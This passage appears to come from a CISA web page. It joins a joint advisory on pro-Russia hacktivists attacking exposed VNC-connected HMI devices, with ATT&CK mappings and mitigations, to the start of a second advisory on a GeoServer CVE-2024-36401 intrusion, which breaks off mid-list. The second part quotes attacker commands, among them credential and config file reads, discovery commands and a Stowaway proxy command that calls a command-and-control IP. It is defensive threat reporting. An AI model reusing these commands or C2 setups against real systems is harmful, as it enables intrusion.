Active since March 2022, NoName057(16) has conducted frequent DDoS attacks against government and private sector entities in North Atlantic Treaty Organization (NATO) member states and other European countries perceived as hostile to Russian geopolitical interests. The group operates primarily through Telegram channels and used GitHub, alongside various websites and repositories, to host DDoSia and share materials and TTPs with their followers.
In 2024, NoName057(16) began collaborating closely with other pro-Russia hacktivist groups, operating a joint chat with CARR by mid-2024. In July 2024, NoName057(16) jointly claimed responsibility with CARR for an alleged intrusion against OT assets in the U.S. The high degree of cooperation with CARR likely contributed to the formation of Z-Pentest, which is composed of actors and administrators from both teams, in September 2024.
Z-Pentest
Established in September 2024, Z-Pentest is composed of members from CARR and NoName057(16). The group specializes in OT intrusion operations targeting globally dispersed critical infrastructure entities. Additionally, the group uses “hack and leak” operations and defacement attacks to draw attention to their pro-Russia messaging. Unlike other pro-Russia hacktivist groups, Z-Pentest largely avoids DDoS activities, claiming OT intrusions as attempts to garner more attention from the media.
Shortly after Z-Pentest’s inception, the group announced alliances with CARR and NoName057(16), possibly to leverage the other groups’ subscribers to grow the new channel. In March 2025, Z-Pentest posted evidence claiming OT device intrusions to their channel using a NoName057(16) cyberattack campaign hashtag. Similarly, in April 2025, Z-Pentest shared a video purporting defacement of an HMI by changing system names to NoName057(16) and CARR references. Z-Pentest continues to create new alliances with other groups, like Sector16, to continue growing their subscriber base and incidentally propagate TTPs with new partners.
Sector16
Formed in January 2025, Sector16 is a novice pro-Russia hacktivist group that emerged through collaboration with Z-Pentest. Sector16 actively maintains an online presence, including a public Telegram channel where they share videos, statements, and claims of compromising U.S. energy infrastructure. These communications often align with pro-Russia narratives and reflect their self-proclaimed support for Russian geopolitical objectives.
Members of Sector16 may have received indirect support from the Russian government in exchange for conducting specific cyber operations that further Russian strategic goals. This aligns with broader Russian cyber strategies that involve leveraging non-state threat actors for certain cyber activities, adding a layer of deniability.
Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 18. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
TTP Overview
Pro-Russia hacktivist groups employ easily disseminated and replicated TTPs across various entities, increasing the likelihood of widespread adoption and escalating the frequency of intrusions. These groups have limited capabilities, frequently misunderstanding the processes they aim to disrupt. Their apparent low level of technical knowledge results in haphazard attacks where actors intend to cause physical damage but cannot accurately anticipate actual impact. Despite these limitations, the authoring organizations have observed these groups willfully cause actual harm to vulnerable critical infrastructure.
Pro-Russia hacktivist groups use the TTPs in this Cybersecurity Advisory to target virtual network computing (VNC)-connected HMI devices. These groups are primarily seeking notoriety with their actions. While they have caused damage in some instances, they regularly make false or exaggerated claims about their attacks on critical infrastructure to garner more attention. They frequently misrepresent their capabilities and the impacts of their actions, portraying minor incursions as significant breaches, but such incursions can still lead to lost time and resources for operators remediating systems.
Additionally, pro-Russia hacktivists use an opportunistic targeting methodology. They leverage superficial criteria, such as victim availability and existing vulnerabilities, rather than focusing on strategically significant entities. Their lack of strategic focus can lead to a broad array of targets, ranging from water treatment facilities to oil well systems. Pro-Russia hacktivists have demonstrated a pattern of frequently taking advantage of the widespread availability of vulnerable VNC connections. While system owners typically use VNC connections for legitimate remote system access functions, threat actors can maliciously use these connections to broadly target numerous platforms and services. Consequently, these groups can indiscriminately compromise critical infrastructure entities, including those in the Water and Wastewater, Food and Agriculture, and Energy Sectors.
Pro-Russia hacktivist groups have successfully targeted supervisory control and data acquisition (SCADA) networks using basic methods, and in some cases, performed simultaneous DDoS attacks against targeted networks to facilitate SCADA intrusions. As recently as April 2025, threat actors used the following unsophisticated TTPs to access networks and conduct SCADA intrusions:
- Scan for vulnerable devices on the internet [T0883] with open VNC ports [T1595.002].
- Initiate temporary virtual private server (VPS) [T1583.003] to execute password brute force software.
- Use VNC software to access hosts [T1021.005].
- Confirm connection to the vulnerable device [T0886].
- Brute force the password, if required [T1110.003].
- Gain access to HMI devices [T0883], typically with default [T0812], weak, or no passwords [T0859].
- Log the confirmed vulnerable device IP address, port, and password.
- Using the HMI graphical interface [T0823], capture screen recordings or intermittent screenshots while conducting the following actions, intending to affect productivity and cause additional costs [T0828]:
- Disconnect from the device, ending the VNC connection.
- Research the compromised device company after the intrusion [T1591].
Propagation
To reach a wider audience, pro-Russia hacktivist groups work together, amplify each other’s posts, create additional groups to amplify their own posts, and likely share TTPs. For example, Z-Pentest jointly claimed intrusion of a U.S. system with Sector16. Sector16 later began posting additional intrusions for which the group claimed sole responsibility. It is likely that these and similar groups will continue to iterate and share these methods to disrupt critical infrastructure organizations.
Reconnaissance and Initial Access
The threat actors’ intrusion methodology is relatively unsophisticated, inexpensive to execute, and easy to replicate. These pro-Russia hacktivist groups abuse popular internet-scraping tools, such as Nmap or OPENVAS, to search for visible VNC services and use brute force password spraying tools to access devices via known default or otherwise weak credentials. Threat actors typically search for these services on the default port 5900 or other nearby ports (5901-5910). Their goal is to gain remote access to HMI devices connected to live control networks.
Once threat actors obtain access, they manipulate available settings from the graphical user interface (GUI) on the HMI devices, such as arbitrary physical parameter and setpoint changes, or conduct defacement activities. Because pro-Russia hacktivist groups seem to lack sector-specific expertise or cyber-physical engineering knowledge, they currently cannot reliably estimate the true impact of their actions. Regardless of outcome, pro-Russia hacktivist groups often post images and screen recordings to their social media platforms, boasting the compromises and exaggerating impacts to garner attention from their peers and the media.
Impact
While pro-Russia hacktivist groups currently demonstrate limited ability to consistently cause significant impact, there is a risk that their continued attacks will result in further harm or grievous physical consequences. Attacks have not yet caused injury; however, the attacks against occupied factories and community facilities demonstrate a lack of consideration for human safety.
Victim organizations reported that the most common operational impact caused by these threat actors is a temporary loss of view, necessitating manual intervention to manage processes. However, any modifications to programmatic and systematic procedures can result in damage or disruption, including substantial labor costs from hiring a programmable logic controller programmer to restore operations, costs associated with operational downtime, and potential costs for network remediation.
MITRE ATT&CK Tactics and Techniques
See Table 1 to Table 10 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
| Technique Title | ID | Use |
|---|---|---|
| Gather Victim Organization Information | T1591 | Threat actors use information available on the internet to determine what systems they believe they have compromised and post the information on their social media. This methodology frequently leads to the threat actors misidentifying their claimed victims. |
| Active Scanning: Vulnerability Scanning | T1595.002 | Threat actors use open source tools to look for IP addresses in target countries with visible VNC services on common ports. |
| Technique Title | ID | Use |
|---|---|---|
| Acquire Infrastructure: Virtual Private Server | T1583.003 | Threat actors use virtual infrastructure to obfuscate identifiers. |
| Technique Title | ID | Use |
|---|---|---|
| Internet Accessible Device | T0883 | Threat actors gain access through less secure HMI devices exposed to the internet. |
| Technique Title | ID | Use |
|---|---|---|
| Valid Accounts | T0859 | Threat actors use password guessing tools to access legitimate accounts on the HMI devices. |
| Technique Title | ID | Use |
|---|---|---|
| Brute Force: Password Spraying | T1110.003 | Threat actors use tools to rapidly guess common or simple passwords. |
| Technique Title | ID | Use |
|---|---|---|
| Default Credentials | T0812 | Threat actors seek and build libraries of known default passwords for control devices to access legitimate user accounts. |
| Remote Services | T0886 | Threat actors leverage VNC services to access system HMI devices. |
| Remote Services: VNC | T1021.005 | Threat actors hunt VNC-enabled devices visible on the internet and connect with remote viewer software. |
| Technique Title | ID | Use |
|---|---|---|
| Graphical User Interface | T0823 | Threat actors interact with HMI devices via GUIs, attempting to modify control devices. |
| Technique Title | ID | Use |
|---|---|---|
| Device Restart/Shutdown | T0816 | While threat actors claim to turn off HMIs, it is possible that operators (not the threat actors) turn the devices off during incident response. |
| Alarm Suppression | T0878 | Threat actors use HMI interfaces to clear alarms caused by their activity and alarms already present on the system at the time of their intrusion. |
| Change Credential | T0892 | Threat actors change the usernames and passwords of HMI devices in operator lockout attempts, usually resulting in a loss of view and operators switching to manual operations. |
| Technique Title | ID | Use |
|---|---|---|
| Modify Parameter | T0836 | Threat actors attempt to change upper and lower limits of operational devices as available from the HMI. |
| Unauthorized Command Message | T0855 | Threat actors attempt to send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, causing possible impact. |
| Technique Title | ID | Use |
|---|---|---|
| Loss of Productivity and Revenue | T0828 | Threat actors purposefully attempt to impact productivity and create additional costs for the affected entities. |
| Loss of View | T0829 | Threat actors change credentials on HMI devices, preventing operators from modifying processes remotely. |
| Manipulation of Control | T0831 | Threat actors change setpoints in processes, impacting the efficiency of operations for those specific processes. |
Incident Response
If organizations find exposed systems with weak or default passwords, they should assume threat actors compromised the system and begin the following incident response protocols:
- Determine which hosts were compromised and isolate them by quarantining or taking them offline.
- Initiate threat hunting activities to scope the intrusion. Collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.
- Reimage compromised hosts.
- Provision new account credentials.
- Report the compromise to CISA, FBI, and/or NSA. See the Contact Information section of this advisory.
- Harden the network to prevent additional malicious activity. See the Mitigations section of this advisory for guidance.
Mitigations
OT Asset Owners and Operators
The authoring organizations recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections.
- Reduce exposure of OT assets to the public-facing internet. When connected to the internet, OT devices are easy targets for malicious cyber threat actors. Many devices can be found by searching for open ports on public IP ranges with search engine tools to target victims with OT components [CPG 3.S].
- Asset owners should use attack surface management services and web-based search platforms to scan the internet. This mitigation can help identify if there are VNC systems exposed within the IP ranges they own, especially for connections set up by third parties.
Note: For more information on attack surface management, see CISA’s Internet Exposure Reduction Guidance, CISA’s Cyber Hygiene Services for U.S. critical infrastructure, and NSA’s Attack Surface Management for the U.S. Defense Industrial Base. - Implement network segmentation between IT and OT networks. Segmenting critical systems and introducing a demilitarized zone (DMZ) for passing control data to enterprise logistics reduces the potential impact of cyber threats and the risk of disruptions to essential OT operations [CPG 3.I].
- Consider implementing a firewall and/or virtual private network if exposure to the internet is necessary for controlling access to devices.
- Consider disabling public exposure by default and implementing time-limited remote access to reduce the amount of time systems are exposed.
- Restrict and monitor both inbound and outbound traffic at OT perimeter firewalls. Configure OT perimeter firewalls to enforce a default-deny policy for all traffic. Asset owners should explicitly permit authorized destinations and protocols based on operational requirements.
- Implement strict egress filtering to prevent unauthorized data exfiltration or command-and-control callbacks.
- Regularly audit firewall rulesets and monitor outbound traffic patterns for anomalies indicative of threat actor activity, such as beaconing or unexpected protocol usage.
- Asset owners should use attack surface management services and web-based search platforms to scan the internet. This mitigation can help identify if there are VNC systems exposed within the IP ranges they own, especially for connections set up by third parties.
- Adopt mature asset management processes, including mapping data flows and access points. Generating a complete picture of both OT and IT assets provides visibility to operators and management, allowing organizations to monitor and assess deviations for criticality [CPG 2.A].
- Keep remote access services updated with the latest version available and ensure all systems and software are up to date with patches and necessary security updates.
- Keep VNC systems updated with the latest version available.
- Refer to the joint Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators to help with reducing cybersecurity risk by identifying which assets within their environment should be secured and protected.
- Keep remote access services updated with the latest version available and ensure all systems and software are up to date with patches and necessary security updates.
- Ensure OT assets use robust authentication procedures.
- Many devices lack robust authentication and authorization. Devices with weak authentication are vulnerable targets to threat actors using credential theft techniques.
- Implement MFA where possible. Where MFA is not feasible, use strong, unique passwords. Apply password standards for operator-accessible services on underlying OT assets, as well as network devices protecting those services. This is especially important for services that require internet accessibility [CPG 3.A] [CPG 3.B] [CPG 3.C] [CPG 3.F].
- Establish an allowlist that permits only authorized device IP addresses and/or media access control addresses. The allowlist can be refined to operator working hours to further obstruct malicious threat actor activity; organizations are encouraged to establish monitoring and alerting for access attempts not meeting these criteria [CPG 3.E].
- Disable any unused authentication methods, logic, or features, such as default authentication keys and default passwords. Block all unused high ephemeral ports and monitor for attempted connections using standard protocols on non-standard ports [CPG 3.R].
- Authenticate all access to field controllers before authorizing access to, or modification of, a device’s state, logic, program, or filesystems.
- Enable control system security features that can separate and audit view and control functions. Limiting remotely accessible or default user accounts to “view-only” removes the potential for impact without exploiting a vulnerability [CPG 3.G].
- Implement and practice business recovery/disaster recovery plans. Plans should also take into consideration redundancy, fail-safe mechanisms, islanding capabilities, backup restoration, and manual operation.
- Include scenarios that necessitate switching to manual operations. Maintaining the capability of an organization to revert to manual controls to quickly restore operations is vital in the immediate aftermath of a cyber incident [CPG 6.A].
- Create backups of the engineering logic, configurations, and firmware of HMIs to enable fast recovery. Organizations should routinely test backups and standby systems to ensure safe manual operations in the event of an incident [CPG 3.O].
- Collect and monitor the traffic of OT assets and networking devices. This includes unusual logins or unexpected protocols communicating over the internet, and functions of ICS management protocols that change an asset’s operating mode or modify programs.
- Review configurations for setpoint ranges or tag values to stay within safe ranges and establish alerting for deviations.
- Take a proactive approach in the procurement process by following the guidance outlined in the joint guide Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products.
OT Device Manufacturers
Although critical infrastructure organizations can take steps to mitigate risks, it is ultimately the responsibility of OT device manufacturers to build products that are secure by design. The authoring organizations urge device manufacturers to take ownership of the security outcomes of their customers in line with the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software.
- Eliminate default credentials and require strong passwords. The use of default credentials is a top weakness threat actors exploit to gain access to systems.
- Mandate MFA for privileged users. Changes to engineering logic or configurations are safety-impacting events in critical infrastructure. MFA should be available for safety critical components at no additional cost.
- Practice secure by default principles. OT components were initially designed without public internet connectivity in mind. When internet connection becomes necessary, implementing additional security measures is essential to safeguard these systems. Manufacturers should recognize insecure states and promptly inform users so they can make informed risk decisions.
- Include logging at no additional charge. Change and access control logs allow operators to track safety-impacting events in their critical infrastructure. These logs should be available for no cost and use open standard logging formats.
- Publish Software Bill of Materials (SBOMs). Vulnerabilities in underlying software libraries can affect a wide range of devices. Without an SBOM, it is nearly impossible for a critical infrastructure system owner to measure and mitigate the impact of a vulnerability on their existing systems. See CISA’s SBOM webpage for more information.
Additionally, see CISA’s Secure by Design Alert on how software manufacturers can shield web management interfaces from malicious cyber activity. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.
For more information on secure by design, see CISA’s Secure by Design webpage.
Validate Security Controls
In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how it performs against the ATT&CK techniques described in this advisory.
To start:
- Select an ATT&CK technique described in this advisory (see Table 1 to Table 10).
- Align your security technologies against the technique.
- Test your technologies against the technique.
- Analyze your detection and prevention technologies’ performance.
- Repeat the process for all security technologies to obtain a set of comprehensive performance data.
- Tune your security program, including people, processes, and technologies, based on the data generated by this process.
The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Resources
Entities requiring additional support for implementing any of the mitigations in this advisory should contact their regional CISA Cybersecurity Advisor for assistance. Key resources organizations should reference include:
- CISA, EPA, NSA, FBI, ASD’s ACSC, Cyber Centre, BSI, NCSC-NL, and NCSC-NZ’s Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators offers best practices to assist organizations in identifying and prioritizing which assets should be secured and protected.
- CISA, FBI, NSA, EPA, DOE, USDA, FDA, MS-ISAC, Cyber Centre, and NCSC-UK’s guidance on Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity that can help organizations protect OT systems from pro-Russia hacktivist activity.
- NSA and CISA’s guidance on Control System Defense: Know the Opponent helps organizations defend OT and ICS assets against malicious cyber activity.
- CISA and EPA’s resource page on Water and Wastewater Cybersecurity to help organizations reduce risks posed by malicious cyber actors targeting water and wastewater systems.
- For additional guidance, see CISA, EPA, and FBI’s fact sheet on Top Cyber Actions for Securing Water Systems.
- The Food and Ag-ISAC’s best practices on Food and Ag Cybersecurity: A Guide for Small & Medium Enterprises provides recommendations to help mitigate against cyber threats.
- DOE and National Association of Regulatory Utility Commissioners Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy (DER) webpage provides resources for state public utility commissions and utilities, as well as DER operators and aggregators to help mitigate cybersecurity risks.
Additional resources that apply to this advisory include:
- EPA’s Cybersecurity for the Water Sector resource page provides organizations with guidance on implementing basic cyber hygiene practices.
- CISA’s Cross-Sector Cybersecurity Performance Goals enables critical infrastructure organizations to reduce the likelihood and impact of known risks and adversary techniques.
- CISA’s Require Strong Passwords webpage supports small and medium-sized businesses mitigating against malicious cyber activity that targets weak passwords.
- CISA, NSA, FBI, EPA, TSA, and international partners’ guidance Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products.
- DOE’s guidance on Cyber-Informed Engineering recommends considering cyber-enabled risks during the conception, design, and development phases when manufacturing physical systems.
- CISA’s Cyber Hygiene Services help enable critical infrastructure organizations to reduce their exposure to threats by taking a proactive approach to monitoring and mitigating attack vectors.
- CISA, NSA, FBI, and international partners’ guidance on Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software urges software manufacturers to provide customers with products that are safer and more secure.
- See more information in these Secure by Design Alerts: How Manufacturers Can Protect Customers by Eliminating Default Passwords and How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity.
Contact Information
U.S. organizations are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:
- Contact CISA via CISA’s 24/7 Operations Center at contact@cisa.dhs.gov or 1-844-Say-CISA (1-844-729-2472) or your local FBI field office. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
- For NSA cybersecurity guidance inquiries, contact CybersecurityReports@nsa.gov.
Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.
Canadian organizations: Report incidents by emailing Cyber Centre at contact@cyber.gc.ca.
New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
United Kingdom organizations: Report a significant cyber security incident: report.ncsc.gov.uk (monitored 24 hours) or, for urgent assistance, call 03000 200 973.
Disclaimer
The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and co-sealers.
Acknowledgements
Schneider Electric, Nozomi Networks, Eversource Energy, Electricity Information Sharing and Analysis Center, Chevron, BP, and Dragos contributed to this advisory.
Version History
December 09, 2025: Initial version.
Appendix A: Targeting Methodologies for Pro-Russia Hacktivist Groups
For further information on targeting methodologies for pro-Russia hacktivist groups, see:
- CISA’s alert Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology;
- The joint fact sheet Primary Mitigations to Reduce Cyber Threats to Operational Technology; and
- CISA’s Russia Cyber Threat webpage.
Appendix B: Additional Designators Used for Cited Groups
The cybersecurity industry and cyber actor groups often use various names to reference actor groups. While not exhaustive, the following are the most notable names used within the cybersecurity community to reference the groups in this advisory.
Note: Cybersecurity organizations have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring organizations’ understanding for all activity related to these groupings.
- GRU military unit 74455
- Sandworm Team
- Voodoo Bear
- Seashell Blizzard
- APT44
- Cyber Army of Russia Reborn (CARR)
- CyberArmy of Russia
- Народная CyberАрмия (НКА)
- People’s CyberArmy of Russia (PCA)
- Russian CyberArmy Team (RCAT)
- NoName057(16)
- NoName057(16) Spain
- NoName057(16) Italy
- NoName057(16) France
- Z-Pentest
- Z-Pentest Beograd
- Z-Pentest Alliance
- Z-Alliance
NCSWIC releases the “‘What is a PACE Plan” video
CISA Urges Critical Infrastructure to Be Air Aware
-
CISA Blog
- Helping OT Organizations to Establish Defensible Architecture and More Resilient Operations
Helping OT Organizations to Establish Defensible Architecture and More Resilient Operations
CISA Shares Lessons Learned from an Incident Response Engagement
Advisory at a Glance
| Executive Summary | CISA began incident response efforts at a U.S. federal civilian executive branch (FCEB) agency following the detection of potential malicious activity identified through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA identified three lessons learned from the engagement that illuminate how to effectively mitigate risk, prepare for, and respond to incidents: vulnerabilities were not promptly remediated, the agency did not test or exercise their incident response plan (IRP), and EDR alerts were not continuously reviewed. |
| Key Actions |
|
| Indicators of Compromise |
For a downloadable copy of indicators of compromise, see: |
| Intended Audience |
Organizations: FCEB agencies and critical infrastructure organizations. Roles: Defensive Cybersecurity Analysts, Vulnerability Analysts, Security Systems Managers, Systems Security Analysts, and Cybersecurity Policy and Planning Professionals. |
| Download the PDF version of this report | AA25-266A advisory cisa shares lessons learned from ir engagement |
Introduction
The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this Cybersecurity Advisory to highlight lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency. CISA is publicizing this advisory to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and aggregating logs in a centralized out-of-band location. CISA is also raising awareness about the tactics, techniques, and procedures (TTPs) employed by these cyber threat actors to help organizations safeguard against similar exploits.
CISA began incident response efforts at an FCEB agency after the agency identified potential malicious activity through security alerts generated by the agency’s endpoint detection and response (EDR) tool. CISA discovered cyber threat actors compromised the agency by exploiting CVE-2024-36401 in a GeoServer about three weeks prior to the EDR alerts. Over the three-week period, the cyber threat actors gained separate initial access to a second GeoServer via the same vulnerability and moved laterally to two other servers.
Leveraging insights CISA gleaned from the organization’s security posture and response, CISA is sharing lessons learned for organizations to mitigate similar compromises (see Lessons Learned for more details):
- Vulnerabilities were not promptly remediated.
- The cyber threat actors exploited CVE-2024-36401 for initial access on two GeoServers.
- The vulnerability was disclosed 11 days prior to the cyber threat actors accessing the first GeoServer and 25 days prior to them accessing the second GeoServer.
- The agency did not test or exercise their incident response plan (IRP), nor did their IRP enable them to promptly engage third parties and grant third parties access to necessary resources.
- This delayed certain elements of CISA’s response as the IRP did not have procedures for involving third-party assistance or for granting third-party access to their security tools.
- EDR alerts were not continuously reviewed, and some public-facing systems lacked endpoint protection.
- The activity remained undetected for three weeks; the agency missed an opportunity to detect this activity earlier as they did not observe an alert from a GeoServer and the Web Server did not have endpoint protection.
These lessons highlight strategies to effectively mitigate risk, enhance preparedness, and respond to incidents with greater efficiency. CISA encourages all organizations to consider the lessons learned and apply the associated recommendations in the Mitigations section of this advisory to improve their security posture.
This advisory also provides the cyber threat actors’ TTPs and indicators of compromise (IOCs). For a downloadable copy of IOCs, see:
Technical Details
Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques.
Threat Actor Activity
CISA responded to a suspected compromise of a large FCEB agency after the agency’s security operations center (SOC) observed multiple endpoint security alerts.
During the incident response, CISA discovered that cyber threat actors gained access to the agency’s network on July 11, 2024, by exploiting GeoServer vulnerability CVE 2024-36401 [CWE-95: “Eval Injection”] on a public-facing GeoServer (GeoServer 1). This critical vulnerability, disclosed June 30, 2024, allows unauthenticated users to gain remote code execution (RCE) on affected GeoServer versions [1]. The cyber threat actors used this vulnerability to download open source tools and scripts and establish persistence in the agency’s network. (CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog on July 15, 2024.)
After gaining initial access to GeoServer 1, the cyber threat actors gained separate initial access to a second GeoServer (GeoServer 2) on July 24, 2024, by exploiting the same vulnerability. They moved laterally from GeoServer 1 to a web server (Web Server) and then a Structured Query Language (SQL) server. On each server, they uploaded (or attempted to upload) web shells such as China Chopper, along with scripts designed for remote access, persistence, command execution, and privilege escalation. The cyber threat actors also used living off the land (LOTL) techniques.
See Figure 1 for an overview of the cyber threat actors’ activity and the following sections for detailed threat actors TTPs.
Figure 1. Overview of Threat Actor Activity
Reconnaissance
The cyber threat actors identified CVE-2024-36401 in the organization’s public-facing GeoServer using Burp Suite Burp Scanner [T1595.002]. CISA detected this scanning activity by analyzing web logs and identifying signatures associated with the tool. Specifically, CISA observed domains linked to Burp Collaborator—a component of Burp Suite used for vulnerability detection—originating from the same IP address the cyber threat actors later used to exploit the GeoServer vulnerability for initial access.
Resource Development
The cyber threat actors used publicly available tools to conduct their malicious operations. In one instance, they gained remote access to the organization’s network and leveraged a commercially available virtual private server (VPS) from a cloud infrastructure provider [T1583.003].
Initial Access
To gain initial access to GeoServer 1 and GeoServer 2, the cyber threat actors exploited CVE 2024-36401 [T1190]. They leveraged this vulnerability to gain RCE by performing “eval injection,” a type of code injection that allows an untrusted user’s input to be evaluated as code. The cyber threat actors likely attempted to load a JavaScript extension to gain webserver information as an Apache wicket on GeoServer 1. However, their efforts were likely unsuccessful, as CISA observed attempts to access the .js file returning 404 responses in the web logs, indicating that the server could not find the requested URL.
Persistence
The cyber threat actors primarily used web shells [T1505.003] on internet-facing hosts, along with cron jobs (scheduled commands that run automatically at specified times) [T1053.003], and valid accounts [T1078] for persistence. CISA also identified the creation of accounts—although these accounts were later deleted—with no evidence indicating further use.
Privilege Escalation
The cyber threat actors attempted to escalate privileges with the publicly available dirtycow tool [2], which can be used to exploit CVE-2016-5195 [CWE-362: “Race Condition”] [T1068]. After compromising web service accounts, they escalated their local privileges to transition away from these service accounts (it is unknown how they escalated privileges).
Note: CVE-2016-5195 affects Linux kernel 2.x through 4.x before 4.8.3 and allows users to escalate privileges. CISA added this CVE to its KEV Catalog on March 3, 2022.
Defense Evasion
To evade detection, the cyber threat actors employed indirect command execution via .php web shells and xp_cmdshell [T1202] and abused Background Intelligence Transfer Service (BITS) jobs [T1197]. CISA also observed files on GeoServer 1 named RinqQ.exe and RingQ.rar, which likely refer to a publicly available defense evasion tool called RingQ [3], that the cyber threat actors staged for potential use.
Note: CISA could not recover most of the files on the host to confirm their contents.
Credential Access
Once inside the organization’s network, the cyber threat actors primarily relied on brute force techniques [T1110] to obtain passwords for lateral movement and privilege escalation. They also accessed service accounts by exploiting their associated services.
Discovery
After gaining initial access, the cyber threat actors conducted discovery to facilitate lateral movement. They performed ping sweeps of hosts within specific subnets [T1018] and downloaded the fscan tool [4] to scan the organization’s network. CISA identified the use of the fscan tool by analyzing evidence of its output found on disk. (Note: fscan is publicly available on GitHub and is capable of port scanning, fingerprinting, and web vulnerability detection—among other functions.) Between July 15 and 31, 2024, the cyber threat actors conducted extensive network and vulnerability scanning using fscan and linux-exploit-suggester2.pl. CISA’s host forensics analysts uncovered this activity by reviewing remnants the cyber threat actors left on disk.
GeoServer 1
The cyber threat actors leveraged CVE-2024-36401 to execute the following host discovery commands on GeoServer 1:
Additionally, they employed LOTL techniques for user, service, filesystem, and network discovery on GeoServer 1:
- cat /etc/passwd [T1087.001]
- cat /etc/resolv.conf
- cat /usr/local/apache-tomcat-9.0.89/webapps/geoserver/WEB-INF/web.xml
- cat /etc/redhat-release [T1082]
- cat /etc/os-release
The cyber threat actors then used curl commands to download a shell script named mm.sh (which they renamed to aa.sh) and a zip file named aaa.zip to the /tmp/ directory.
Subsequently, they enumerated the internal network from GeoServer 1, identifying Secure Shell (SSH) listeners, File Transfer Protocol (FTP) servers, file servers, and web servers [T1046] by using the fscan tool. (Note: CISA observed endpoint logs that showed the cyber threat actors uploaded fscan to the compromised host and ran it against internal systems.) The actors then attempted to brute force login credentials for the exploited web services to gain remote access, achieve RCE, or move laterally.
The cyber threat actors also conducted ping sweeps of several hosts within the organization’s internal subnets using fscan. Their use of the -nobr and -nopoc flags for fscan indicated that this scan excluded brute forcing or vulnerability scanning, respectively.
SQL Server
CISA observed the following discovery commands on the organization’s SQL server:
- whoami [T1033]
- ipconfig /all
- ping -n 1 8.8.8.8
- systeminfo
- tasklist [T1057]
- dir c:\ [T1083]
- dir c:\Users
- type c:\Last.txt
- type c:\inetpub\wwwroot
- type c:\inetpub\
- dir c:\inetpub\wwwroot
- dir c:\
- dir c:\ifwapps
- dir d:\
- dir e:\
- net group "domain admins" /domain
- type C:\Windows\System32\inetsrv\config\applicationHost.config
- dir c:\ifwapps\Tier1Utilities
- netstat -ano
- curl
- net user
- tasklist
GeoServer 2
Based on images CISA received of GeoServer 2, CISA observed the bash history of a user that showed the use of Burp Collaborator to execute encoded host and network discovery commands.
Lateral Movement
In one instance, the cyber threat actors moved laterally from the Web Server to the SQL Server by enabling xp_cmdshell for RCE on GeoServer 1.
Command and Control
The cyber threat actors used PowerShell [T1059.001] and bitsadmin getfile to download payloads [T1105].
They used Stowaway [5], a publicly available multi-level proxy tool, to establish C2 [T1090]. Stowaway enabled the cyber threat actors to bypass the organization’s intranet restrictions and access internal network resources by forwarding traffic from their C2 server through the Web Server. They wrote Stowaway to disk using a tomcat service account.
The actors then executed Stowaway via /var/tmp/agent -c 45.32.22[.]62:4441 -s f86bc7ff68aff3ad –up http –reconnect 10.
To test their level of access, the cyber threat actors performed a ping sweep of multiple hosts in a particular subnet of the organization’s network. Next, the cyber threat actors downloaded a modified version of Stowaway using a curl command, successfully establishing an outbound connection with their C2 server using HTTP over TCP/4441.
On July 14, 2024, the cyber threat actors executed /tmp/mm.sh on the Web Server followed by an encoded command to execute Stowaway. The contents of this file could not be recovered. Additionally, they used Stowaway to establish a second C2 connection over TCP/50012, likely serving as a backup C2 channel.
CISA discovered evidence of various files hosted on the C2 server, including numerous publicly available tools and scripts:
- RingQ antivirus defense evasion tool (
RingQ.exe,RingQ.rar) - IOX proxy tool (
iox.rar) - BusyBox trojan multi-tool (
